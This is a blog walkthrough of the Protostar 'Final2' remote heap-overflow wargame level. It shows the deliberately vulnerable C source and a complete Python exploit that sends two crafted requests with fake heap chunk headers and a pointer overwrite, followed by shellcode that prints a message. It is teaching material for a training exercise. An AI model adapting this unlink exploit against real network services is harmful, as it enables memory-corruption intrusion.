Binary Exploitation Protostar Final2 - Walkthrough

Namaste Friends,



Today In This post, I am going to share with you my walk through experience of Exploit Exercise Proto Star Final2 Level.


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.
  •  All Credit Related To Exploit Exercise War Games Goes To exploit-exercises.com.

let's Start

Source Codes



#include "../common/common.c"
#include "../common/malloc.c"

#define NAME "final2"
#define UID 0
#define GID 0
#define PORT 2993

#define REQSZ 128

void check_path(char *buf)
{
  char *start;
  char *p;
  int l;

  /*
  * Work out old software bug
  */

  p = rindex(buf, '/');
  l = strlen(p);
  if(p) {
      start = strstr(buf, "ROOT");
      if(start) {
          while(*start != '/') start--;
          memmove(start, p, l);
          printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
          "yes" : "no", start - buf);
      }
  }
}

int get_requests(int fd)
{
  char *buf;
  char *destroylist[256];
  int dll;
  int i;

  dll = 0;
  while(1) {
      if(dll >= 255) break;

      buf = calloc(REQSZ, 1);
      if(read(fd, buf, REQSZ) != REQSZ) break;

      if(strncmp(buf, "FSRD", 4) != 0) break;

      check_path(buf + 4);     

      dll++;
  }

  for(i = 0; i < dll; i++) {
                write(fd, "Process OK\n", strlen("Process OK\n"));
      free(destroylist[i]);
  }
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID); 
  
  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  get_requests(fd);

}

Hint



Remote heap level :)

Core files will be in /tmp.

This level is at /opt/protostar/bin/final2

Vulnerable Function



  /*
  * Work out old software bug
  */

  p = rindex(buf, '/');
  l = strlen(p);
  if(p) {
      start = strstr(buf, "ROOT");
      if(start) {
          while(*start != '/') start--;
          memmove(start, p, l);
          printf("moving from %p to %p (exploit: %s / %d)\n", p, start, start < buf ?
          "yes" : "no", start - buf);
      }

Planing

Well, Solving This Challenge was really very fun and amazing. As we can see, No need to find vulnerable function and if you have done, heap levels honestly then this level is just a piece of cake.
Nothing more!

Exploit



import struct
import socket

# Total Buff 128
# ==========================================
# |  Buff(128)   | -8(4) | -4 |  FD  |  BR |
# ==========================================


# First Buff
payload = 'FSRDBBBB'


# push 0x804e0ae
# ret
payload+= '\xB8\x98\xE0\x04\x08\xFF\xE0'

# '\xB8\xB2\xE0\x04\x08\xFF\xE0'
# '\xB8\xAE\xE0\x04\x08\xFF\xE0'
# '\x68\xAE\xE0\x04\x08\xC3' # Limited size (8 bytes)Shellcode


payload+= 'B'*(128-len(payload)-1)
payload+= '/'
payload1 = payload


# Second Payload
payload = 'FSRD'
payload+= 'ROOT'
payload+= '\x90'*4
payload+= '/'
payload+= struct.pack("i", -8)
payload+= struct.pack("i", -4)
payload+= struct.pack("i",0x0804d41c-12) # FD
payload+= struct.pack('I', 0x804e010)  # Bk


"""
0:  31 c0                   xor    eax,eax
2:  31 db                   xor    ebx,ebx
4:  31 c9                   xor    ecx,ecx
6:  31 d2                   xor    edx,edx
8:  b0 04                   mov    al,0x4
a:  b3 01                   mov    bl,0x1
c:  68 64 21 21 21          push   0x21212164
11: 68 4f 77 6e 65          push   0x656e774f
16: 89 e1                   mov    ecx,esp
18: b2 08                   mov    dl,0x8
1a: cd 80                   int    0x80
1c: b0 01                   mov    al,0x1
1e: 31 db                   xor    ebx,ebx
20: cd 80                   int    0x80

"""

shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x68\x64\x21\x21\x21\x68\x4f\x77\x6e\x65\x89\xe1\xb2\x08\xcd\x80\xb0\x01\x31\xdb\xcd\x80"
payload+= '\xeb\x0f'
payload+= '\x90'*20 # 90-bytes Shellcode here
payload+= shellcode

payload+= '\xcc'*(128-len(payload))
print payload1+payload


For More Detailed Walk through Check Below Provided YouTube Video Playlist


Share this

Related Posts

Previous
Next Post »